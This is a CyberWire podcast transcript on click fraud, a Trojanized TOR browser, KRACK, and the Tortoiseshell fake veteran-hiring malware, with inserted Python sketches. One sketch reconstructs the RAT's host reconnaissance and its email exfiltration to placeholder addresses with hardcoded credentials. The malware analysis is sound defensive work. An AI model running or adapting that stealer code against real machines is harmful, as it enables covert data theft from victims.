The CyberWire Daily Podcast 10.18.19
Ep 952 | 10.18.19

Clickfraud and third parties (both SDKs and stores). Trojanized TOR browser steals from Russian users. Wi-Fi bugs. Sketchy jailbreak. Big Tech on free speech. Cooperation against terrorism.

Transcript

Dave Bittner: [00:00:03] Clickfraud arrives via third-party SDK, and the app developers who used it say they didn't know nothing. A Trojanized TOR browser warns its bros that, whoa, you're out of date, and the police might see you. But it's really just stealing all the bros' alt-coins. Wi-Fi bugs are fixed in Kindle and Alexa. Don't try to jailbreak your iPhone from a sketchy Checkrain site. Two big tech companies take different directions on free speech. And Russia gets an assist from Uncle Sam. 

Dave Bittner: [00:00:38]  And now a word from our sponsor LookingGlass Cyber. Organizations have been playing a dangerous game of cyber Jenga, stacking disparate security tools, point solutions and boxes one on top of the other, hoping to improve their security posture. This convoluted and overloaded security stack can't hold up in today's micro-segmented, borderless and distributed networks. As the enterprise network grows, organizations need flexible protection around their unique network ecosystems. By weaving security into the investments your organization has already made, formerly disjointed tools can communicate with one another to disrupt and distract the adversary without revealing your defenses. With a software-based approach to unifying your security stack, security teams can easily scale the protection to fit their needs, with one integrated software solution requiring no specialty hardware. Meet the Aeonik Security Fabric. Learn more at lookingglasscyber.com. That's lookingglasscyber.com. And we thank LookingGlass Cyber for sponsoring our show. 

Dave Bittner: [00:01:47]  Funding for this CyberWire podcast is made possible in part by McAfee, security built by the power of harnessing 1 billion threat sensors from device to cloud, intelligence that enables you to respond to your environment and insights that empower you to change it. McAfee, the device-to-cloud cybersecurity company. Go to mcafee.com/insights. 

Dave Bittner: [00:02:09]  From the CyberWire studios at DataTribe, I'm Dave Bittner with your CyberWire summary for Friday, October 18, 2019. 

Dave Bittner: [00:02:18]  Upstream says it's caught the popular Android app Snaptube engaged in large-scale click fraud. TechCrunch says that Snaptube has some 40 million users who employ it to download video and music from major video sites like YouTube and Facebook. Users receive silent ads that run in the background, racking up clicks that, while remaining invisible to the user, drain device battery and goose Snaptube ad click rates. More seriously, they also purchase premium digital services, also silently and in the background. Upstream says it's blocked more than 70 million suspicious requests from almost 4 1/2 million unique devices over a six-month period. 

Dave Bittner: [00:03:00]  Snaptube isn't offered in Google Play but is instead downloaded from third-party app stores. The problem appears to lie in malicious code embedded in a third-party software development kit Snaptube uses. This code, known as Mango, had earlier been implicated in a click fraud campaign involving Vidmate, another downloader app accused of ad fraud back in May. 

Dave Bittner: [00:03:23]  For its part, Mobiuspace was shocked, shocked, to learn that click fraud was going on. And they say they're considering legal action against Mango's developers. This incident illustrates at least two things. First, while official stores aren't perfect, they're usually a better security bet than third-party app stores. And anyway, perfection is an unreasonable standard, even for Google Play. Second, it illustrates the problem of software supply chain security. It's not the first time Snaptube has been the object of complaints about click fraud. Sophos reported finding it back in February. And later this year, some Android devices began flagging it as containing suspicious code. The ease of using SDKs may be a fatal temptation, assuming, of course, that claiming the SDK ate my brand reputation isn't a dot-com equivalent of the dog ate my homework. 

Dave Bittner: [00:04:16]  ESET describes a Trojanized TOR browser that warns victims that they're vulnerable to police snooping because their browser is out of date. The bogus update page to which the unwary are redirected installs malware that enables the crooks to steal cryptocurrency - mostly Qiwi, but some bitcoin as well. The caper is conducted in Russian and is directed against Russian-speaking visitors to various darknet sites. Many of these sites - but we'll hasten to add not all of them - are likely to be the home of nastiness and contraband likely to give visitors an uneasy conscience. 

Dave Bittner: [00:04:52]  The warning page goes for a chummy, one-dude-to-another tone, not the sort of we see what you're up to manner that's so often associated with scareware. For example, it addresses the victim as bro and offers a sympathetic fix to keep the militia off their back. And it's worth recalling here that the victims are Russian speakers. For all the news of Russian hacking we see, there are plenty of Russian victims in cyberspace, too. 

Dave Bittner: [00:05:17]  ESET has also reported that older and unpatched versions of Amazon's Kindle and Echo are vulnerable to key reinstallation attacks that exploit Wi-Fi vulnerabilities to achieve man-in-the-middle status that could enable a range of bad activities, from snooping to distributed denial-of-service. The method of attack is the KRACK approach discovered in 2017, which takes advantage of endemic issues in the WPA2 standard. Users should note first that Amazon has patched the problems, so they should update their devices. And second, the vulnerability, as is almost always the case with Wi-Fi issues, is one that's exploitable only at close range. Nonetheless, Alexa, go update yourself. 
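
The core danger in a key reinstallation attack is nonce reuse: reinstalling an already-used key resets the transmit nonce, so the same keystream ends up encrypting more than one frame. The toy Python sketch below is an illustration of keystream reuse in general, not of the WPA2 handshake manipulation KRACK actually performs, and it shows why the reuse is fatal to confidentiality: an eavesdropper can cancel the keystream by XORing two captured ciphertexts, no key required.

```python
# Toy illustration (not the KRACK exploit itself): why nonce reuse, and hence
# keystream reuse, breaks confidentiality in any stream-style cipher.

import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

# Two plaintexts encrypted under the SAME keystream (the nonce-reuse scenario).
p1 = b"GET /login?user=alice&pass=hunter2"
p2 = b"GET /login?user=bob&pass=swordfish"
keystream = os.urandom(max(len(p1), len(p2)))

c1 = xor(p1, keystream)
c2 = xor(p2, keystream)

# An eavesdropper who captures both ciphertexts can cancel the keystream:
# c1 XOR c2 == p1 XOR p2, with no knowledge of the key at all.
leaked = xor(c1, c2)
assert leaked == xor(p1, p2)

# If one plaintext is known or guessable, the other falls out completely.
recovered_p2 = xor(leaked, p1)
print(recovered_p2)  # b'GET /login?user=bob&pass=swordfish'
```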

Dave Bittner: [00:06:01]  People who are, for reasons of their own, enthusiastic about jailbreaking their iPhones have been interested in Checkra1n, a jailbreak that makes use of the Checkm8 vulnerability found in some older iOS devices. They've been drawn to a site that says it's got the goods, the real deal Checkrain jailbreak. But it doesn't. The only thing you'll get from going there, Cisco Talos warns, is enrollment in an ad fraud campaign. 

Dave Bittner: [00:06:29]  While Apple CEO Tim Cook mollifies Chinese authorities, as WIRED and other media outlets describe, Facebook CEO Mark Zuckerberg came out swinging yesterday like a First Amendment true believer. The Telegraph and many others report that he said in an address at Georgetown University that his company is not only uninterested in returning to business in China, but that it intends to resist calls to moderate political speech. Facebook, he said, was unable to reach an accommodation with China because it's been unwilling to knuckle under to Beijing's strong position on state control or at least approval of internet content. 

Dave Bittner: [00:07:06]  Zuckerberg expressed Facebook's strong commitment to free speech as grounds for refusing to moderate political content. He argued that the Chinese government's values ought not to set the norms for the internet as a whole. He also observed with some concern that freedom of speech seemed to be under assault in the West as well, where too many people have come to believe that their political objectives are so important that opposing views should be suppressed. In any case, he said that Facebook won't censor political ads, even when they contain what its fact-checkers decide are lies. 

Dave Bittner: [00:07:39]  This week has seen a kind of quick reputational role reversal for Apple and Facebook. Apple has been famously committed to privacy, but that commitment seems to have eroded a bit in the solvent of China's repressive actions in Hong Kong. Facebook, on the other hand, which has had to master the art of apology for data mishandling, may have had a complicated relationship with privacy, but it seems now to be committed to freedom of speech. 

Dave Bittner: [00:08:05]  And finally, back to Russia. TASS is authorized to state that while the enemy of my enemy may not exactly be my friend, they might at least be a helpful legal attache at the embassy. The Moscow Times has some information on U.S. assistance to Russia's FSB in a Russian domestic counterterror operation. What terrorist group was implicated isn't publicly known, but the U.S. has in the past given Russia intelligence on Islamist operations. Nevertheless, Russo-American relations in cyberspace aren't all rainbows and unicorns. Cozy Bear, after all, has resurfaced in the news. But the notes from TASS are a reminder that even opponents sometimes find common ground. 

Dave Bittner: [00:08:54]  And now a word from our sponsor, ThreatConnect. Designed by analysts but built for the entire team, ThreatConnect's intelligence-driven security operations platform is the only solution available today with intelligence, automation, analytics and workflows in a single platform. Every day, organizations worldwide use ThreatConnect as the center of their security operations to detect, respond, remediate and automate. With all of your knowledge in one place, enhanced by intelligence, enriched with analytics, driven by workflows, you'll dramatically improve the effectiveness of every member of the team. Want to learn more? Check out their newest e-book "SOAR Platforms: Everything You Need To Know About Security, Orchestration, Automation, And Response." The book talks about intelligence-driven orchestration, decreasing time to response and remediation with SOAR and ends with a checklist for a complete SOAR solution. Download it at threatconnect.com/cyberwire. That's threatconnect.com/cyberwire, and we thank ThreatConnect for sponsoring our show.

Dave Bittner: [00:10:08]  And joining me once again is Craig Williams. He's the head of Talos outreach at Cisco. Craig, it's always great to have you back. You all recently published a blog post, and it's titled How Tortoiseshell Created a Fake Veteran Hiring Website to Host Malware. A lot to unpack here - describe to us what's going on. 

Craig Williams: [00:10:28]  Well, this is basically, you know, another great example of an attacker finding, you know, a really clever social engineering angle to make victims become more susceptible to a traditional malware campaign. I mean, you know, if you look back on it, this is not too dissimilar from other things we've seen in the past, right? Like, you see things like attackers pretending you have a bill due, and you should immediately click and log in, right? 

Craig Williams: [00:10:53]  And so when they go for these types of emotionally charged issues - right? - be it you're going to help out heroes, you've got a bill due, you know, your password's been compromised - all those are really designed to have you react emotionally. The thought process is basically, the faster and more quickly you can react emotionally, the less likely you are to think it through, and then the bad guy is much more likely to get their way. 

Dave Bittner: [00:11:17]  Yeah. We're going to short-circuit your skepticism here. 

Craig Williams: [00:11:20]  Right. And so in this particular case, you know, the bad guys actually found, you know, a relatively convincing-sounding domain. You know, hiremilitaryheroes.com - it sounds legit, right? 

Dave Bittner: [00:11:33]  I'm surprised it was available. 

Craig Williams: [00:11:34]  It's one of those domains where a bad guy finds it, it's not taken, and so they take it, and they put up a page that looks legitimate on there. And then they just start their scam, and in this case, it was a malware campaign designed to target people who wanted to help out members of the military. 

Dave Bittner: [00:11:53]  Well, let's walk through it step-by-step. I get sent to this website. I get lured to this website. What do I see, and what happens next? 

Craig Williams: [00:12:00]  Well, you see a nice little logo, right? You see the soldiers. I think it's the D-Day picture, putting the flag up. And it's got, you know, "we make America safer" in red, orange and green. You know, once you go through that, it basically starts to trick you into downloading a desktop app, right? So, like, No. 1 right there - you know, don't go to a website and install their app. 

Dave Bittner: [00:12:27]  Yeah, but I could imagine if I'm somebody looking for work, I might do whatever has been asked of me here. 

Craig Williams: [00:12:34]  And that, I'm sure, is part of the thought process of impersonating a site like this. 

Dave Bittner: [00:12:39]  Yeah. 

Craig Williams: [00:12:40]  You know, but as a user of the internet, you need to realize, well, why would I need to download this app? What does it do? What permissions does it need, right? You know, do I have to install it? Can I just fill out a form? And those are the types of questions that'll probably help a user or a victim realize that maybe everything's not on the up-and-up here. 

Dave Bittner: [00:13:01]  So what does it download? And then what happens? 

Craig Williams: [00:13:03]  Well, the very first thing it does is it'll try and reach out to Google. And if you basically have, you know, a tool like Little Snitch or another type of firewall, it'll say, hey, you downloaded this binary from the internet, and it's trying to reach out - Little Snitch, sorry, that's an OS X firewall. But if you had something equivalent for Windows, it would say, hey, you know, you've got a binary trying to reach out to the internet. Do you want to allow it or not? And potentially, it would stop it. And blocking that check actually stops the malware in its tracks. 

Craig Williams: [00:13:33]  So that's, you know, a traditional type of check that we've seen in a lot of software to try and determine if it's being meddled with or if it's being run in an environment where it might be subject to more analysis. So, you know, a pretty conventional check. And if that check succeeds and the malware is able to reach Google and execute normally, it installs a RAT. And that RAT basically is a reconnaissance tool. And here's the interesting part - it sends the information over email. 

Dave Bittner: [00:14:01]  Really? 

Craig Williams: [00:14:02]  That's kind of unusual, but it sends an email to a Gmail account with hardcoded credentials, and it actually collects a surprising amount of data. We were discussing this the other day. And, you know, a lot of times when you see reconnaissance malware, it does collect a lot of data. But it's very targeted data - right? - like, it'll collect all the MAC addresses, all the machine names and the installed programs, and then, you know, abandon ship. 

Craig Williams: [00:14:28]  With this particular campaign, I've got to wonder if maybe these attackers didn't really know what they were targeting. They just wanted as much information as possible about every machine they could reach. And so then potentially they could determine how to group the machines and then sell them off to the highest bidder. But it gathered everything. I mean, if you look in the blog post, I think we have three pages of screenshots of commands that it's harvesting the output from. 
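
To make the flow Williams describes concrete, here is a minimal Python sketch of that behavior: the Google connectivity gate, broad harvesting of command output, and exfiltration by email using hardcoded credentials. It's a reconstruction for illustration only, not Talos's code or the actual sample; the commands, server, addresses, and credentials are placeholders, not real indicators.

```python
# Illustrative sketch of the described implant behavior (placeholders throughout).

import smtplib
import subprocess
import sys
from email.message import EmailMessage
from urllib.request import urlopen


def internet_reachable(url: str = "https://www.google.com", timeout: int = 5) -> bool:
    """Connectivity gate: if the probe fails, the sample simply exits."""
    try:
        urlopen(url, timeout=timeout)
        return True
    except OSError:
        return False


def harvest(commands: list[list[str]]) -> str:
    """Run reconnaissance commands and collect their output, errors included."""
    chunks = []
    for cmd in commands:
        try:
            result = subprocess.run(cmd, capture_output=True, text=True)
            chunks.append(f"$ {' '.join(cmd)}\n{result.stdout}{result.stderr}")
        except OSError as exc:
            chunks.append(f"$ {' '.join(cmd)}\n<failed: {exc}>")
    return "\n".join(chunks)


def main() -> None:
    # The check discussed above: if a host firewall (Little Snitch on macOS,
    # or a Windows equivalent) blocks this probe, nothing further runs.
    if not internet_reachable():
        sys.exit(0)

    # Broad, untargeted collection - "everything", not a targeted subset.
    report = harvest([["systeminfo"], ["ipconfig", "/all"], ["tasklist"]])

    # Exfiltration over ordinary email with hardcoded credentials
    # (placeholder account, password, and server).
    msg = EmailMessage()
    msg["From"] = "collector@example.com"
    msg["To"] = "collector@example.com"
    msg["Subject"] = "host report"
    msg.set_content(report)
    with smtplib.SMTP_SSL("smtp.example.com", 465) as server:
        server.login("collector@example.com", "placeholder-password")
        server.send_message(msg)


if __name__ == "__main__":
    main()
```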

Dave Bittner: [00:14:54]  Now the fact that it's sending off this information to an email account and there are hardcoded credentials, does that give you all the opportunity to go poke around in that email account to see how successful they've been? 

Craig Williams: [00:15:08]  That would be against U.S. law. 

Dave Bittner: [00:15:11]  I see. I'm with you. I'm with you. 

Craig Williams: [00:15:15]  (Laughter) However, if another potentially... 

Dave Bittner: [00:15:16]  But you like the way I'm thinking, right? 

Craig Williams: [00:15:18]  I love it. And I didn't say don't do it. I just (laughter) I'm not offering any sort of opinion or judgment here. Just, you know... 

Dave Bittner: [00:15:27]  (Laughter) OK, very good. Very good. 

Craig Williams: [00:15:29]  But my understanding is - I've been told - that it would not be a thing that we could do. 

Dave Bittner: [00:15:33]  I see. 

Craig Williams: [00:15:35]  And so, you know, while it does gather all that data, it also does maintain persistent access. So - and, you know, this is in line with them doing reconnaissance and then potentially grouping these machines through whatever thing that the, you know, potential buyer would have in common and then allowing them to take over the machine through the Remote Access Trojan. 

Dave Bittner: [00:15:55]  Wow. So do you have any sense for how widespread this is or what sort of success they're seeing? 

Craig Williams: [00:16:00]  We believe we caught it fairly early. We didn't see a ton of emails. We didn't see a lot of activity. It was actually fairly narrow. We didn't have tons of telemetry on it. So we're cautiously optimistic we caught it early. 

Dave Bittner: [00:16:12]  All right. Well, once again, the post is titled How Tortoiseshell Created a Fake Veteran Hiring Website to Host Malware. Craig Williams, thanks for joining us. 

Craig Williams: [00:16:21]  Thank you. 

Dave Bittner: [00:16:26]  Now it's time for a few words from our sponsor, BlackBerry Cylance. You probably know all about legacy antivirus protection. It's very good as far as it goes. But you know what? The bad guys know all about it, too. It will stop the skids. But to keep these savvier hoods' hands off your endpoints, BlackBerry Cylance thinks you need something better. Check out the latest version of CylanceOPTICS. It turns every endpoint into its own security operations center. CylanceOPTICS deploys algorithms formed by machine learning to offer not only immediate protection but security that's quick enough to keep up with the threat by watching, learning and acting on systems' behavior and resources. Whether you're worried about advanced malware, commodity hacking or malicious insiders, CylanceOPTICS can help. Visit cylance.com to learn more. And we thank BlackBerry Cylance for sponsoring our show. 

Dave Bittner: [00:17:26]  I recently spent some time at our local community hospital, not as a patient but keeping a family member company while they went through a bunch of tests. Everything turned out fine, by the way. But while I was there, I couldn't help noticing the number of hospital employees who came and went and how they were accessing information on the computer in our treatment room. 

Dave Bittner: [00:17:46]  I got curious about how that kind of access works. So I reached out to Caleb Barlow. He's been on our show a few times before. And he recently took on the role of CEO at Cynergistek, where they know a thing or two about monitoring health care data privacy. 

Caleb Barlow: [00:18:00]  One of the things that's very unique about health care records is that they need to be open and accessible all the time because you never know when you're going to show up at the emergency room or what pharmacy you're going to go to. You know, you've got to be able to tap into those medical records. And that's part of how we facilitate care today in the United States. 

Dave Bittner: [00:18:19]  I guess I'm imagining an ideal situation where there would be something tracking which health care professionals were actually working on me and would somehow limit that they would be the ones to have access to my records or at the very least authorize or be notified when someone who is outside of that circle of access was either accessing my records or requesting access. 

Caleb Barlow: [00:18:45]  Well, first of all, Dave, let's acknowledge that most health care professionals - in fact, the vast majority - are not only highly ethical at what they do but are as concerned about the privacy of their patients as they are their health care, right? 

Dave Bittner: [00:18:59]  That's a really good point. 

Caleb Barlow: [00:19:00]  That being said, there are a few bad apples in the bunch. And people are curious. So when you show up at the emergency room and your neighbor happens to be a nurse or a physician, they actually might check out why you're there. But we also found that sometimes employees are even more curious. So oftentimes we've witnessed with young doctors, residents and students that they might use a medical record as a phone directory, a dating site or a place to even check up on that special someone and see if maybe they've got an STD in their past. The privacy of this information is really key. And there are a bunch of ways we can trigger off of the activity in that record to say, wait a second - why was this person in this record? They work in pediatrics; why are they looking at an adult record? They didn't prescribe anything. They didn't provide a note on the patient. You know, what else is going on here? 

Caleb Barlow: [00:19:59]  So I think what we're learning here can be extended across many industries. But if we look, for example, Dave, at what were some of the more common levels of unauthorized access, you know, 74% of what we find is insider snooping, meaning that it's someone within the practice that's checking up on a neighbor. That's followed by VIP and confidential patients being about 10%, co-workers being 8%. Neighbors, interestingly enough, are also 8%. So, you know, we find people that happen to be in the same school district, and guess what? They're checking out their friends. This is happening a lot. 

Caleb Barlow: [00:20:41]  Now, to put this in perspective, let's say that you have an institution - let's say a large health care system with maybe 50,000 provisioned users, OK? So, you know, a couple dozen hospitals, pharmacies, et cetera. We'll generate 100 to 300 cases a week out of a volume of that size. And I think what we all have to realize is that this isn't just about drawing those security fences and boundaries around our data; it's also about understanding how is the data being used? And is it being used for the intended purpose? 

Dave Bittner: [00:21:16]  Now, is there a regulatory component here? I'm thinking of things like HIPAA. If you discover something like this, is there an obligation to report? 

Caleb Barlow: [00:21:26]  There is. So under HIPAA, organizations must - and I'll quote - "implement policies and procedures to prevent, detect, contain and correct security violations." HIPAA also says that you have to implement procedures to regularly review records of information system activities, such as audit logs, access reports, security incident tracking, et cetera. So yes, this is covered under HIPAA. It's also covered, in many cases, under the individual breach disclosure laws that we'll see in various states around the United States. 

Caleb Barlow: [00:21:57]  Now, here's the thing you have to keep in mind, though - it doesn't say how you have to do it. So the way this has historically been done is someone runs a report. They run a basic report and say, OK, did anybody in the hospital look up records of anyone else in the hospital and was there a reason why? As an example, right? So they maybe run that report. They find a few issues. They go investigate them. Maybe those individuals get counseled, or worst case, they get fired. But that's historically happening several months after the incident has occurred. 

Caleb Barlow: [00:22:33]  What we're doing is we're applying all the thinking that you put over at a security operations center to do this in real time using UEBA tools. And I think part of what we're learning that can be extended across the security industry is that, first of all, any time you have large volumes of private data you probably have this inappropriate access. But in addition to that, we're finding security incidents that the security teams aren't finding. So a bad guy doesn't act in a - you know, a bad guy that's intent on stealing data out of a health care record actually doesn't act like a doctor. And it shows up like a big red flare really quick. 

Caleb Barlow: [00:23:17]  And if we can catch that at the first couple of records and go, wait a second - why is this person in here coming from the outside, maybe a vendor, they've accessed 50 records all at once, they've provided no notes, no prescriptions, and it doesn't even look like they're treating the patient - why are they in there? If we can detect that at maybe the first few records and stop it, that's something the security team couldn't catch. 
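
For a rough sense of how checks like the ones Barlow describes can be expressed in code, the Python sketch below flags chart accesses with no clinical action, department mismatches, and bulk access from outside vendor accounts over a hypothetical access log. The field names, departments, and thresholds are illustrative assumptions, not Cynergistek's implementation; real UEBA tools build behavioral baselines rather than fixed rules like these.

```python
# Minimal rule-based sketch over a hypothetical EHR access log (illustrative only).

from collections import Counter
from dataclasses import dataclass


@dataclass
class AccessEvent:
    user: str
    user_dept: str        # e.g. "pediatrics", "vendor"
    patient_id: str
    patient_age: int
    wrote_note: bool      # did the user document anything?
    prescribed: bool      # did the user order or prescribe anything?


def flag_suspicious(events: list[AccessEvent], bulk_threshold: int = 50) -> list[str]:
    findings = []
    per_user = Counter(e.user for e in events)

    for e in events:
        # Looked at the chart but took no clinical action: no note, no order.
        if not (e.wrote_note or e.prescribed):
            findings.append(f"{e.user} opened {e.patient_id} with no note or order")
        # Department mismatch: pediatrics staff in an adult chart.
        if e.user_dept == "pediatrics" and e.patient_age >= 18:
            findings.append(f"{e.user} (pediatrics) opened adult chart {e.patient_id}")

    # Bulk access from an outside or vendor account.
    for user, count in per_user.items():
        dept = next(e.user_dept for e in events if e.user == user)
        if dept == "vendor" and count >= bulk_threshold:
            findings.append(f"vendor account {user} touched {count} charts")

    return findings


# Example: a vendor account sweeping many charts with no clinical activity.
log = [AccessEvent("acme-support", "vendor", f"pt-{i:04d}", 45, False, False)
       for i in range(60)]
findings = flag_suspicious(log)
print(f"{len(findings)} findings; e.g. {findings[-1]}")
```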

Dave Bittner: [00:23:43]  So what's your recommendation here for folks who are looking to explore this? How do they get started? 

Caleb Barlow: [00:23:51]  Well, I think the big point here is we're learning that UEBA tools can be used in a totally different way - not just for security, but for monitoring privacy. And that there's probably something to be said for continuously monitoring privacy on large datasets. You know, think of not just health care but also think of all of the implications of GDPR - why wouldn't you want to be in those records, looking for those inappropriate accesses all the time? But I think, also, certainly for health care institutions, there is an important wake-up call here that we need to be monitoring this, and we need to be monitoring it in real time because, again, if we can find that problem early, we can hopefully stop the large-scale breach or correct the behavior before it really goes sideways. 

Dave Bittner: [00:24:45]  That's Caleb Barlow from Cynergistek. 

Dave Bittner: [00:24:53]  And that's the CyberWire. Thanks to all of our sponsors for making the CyberWire possible, especially our supporting sponsor, ObserveIT, the leading insider threat management platform. Learn more at observeit.com. 

Dave Bittner: [00:25:05]  The CyberWire podcast is proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technology. Our amazing CyberWire team is Stefan Vaziri, Kelsea Bond, Tim Nodar, Joe Carrigan, Carole Theriault, Nick Veliky, Bennett Moe, Chris Russell, John Petrik, Jennifer Eiben, Peter Kilpe, and I'm Dave Bittner. Thanks for listening. We'll see you tomorrow.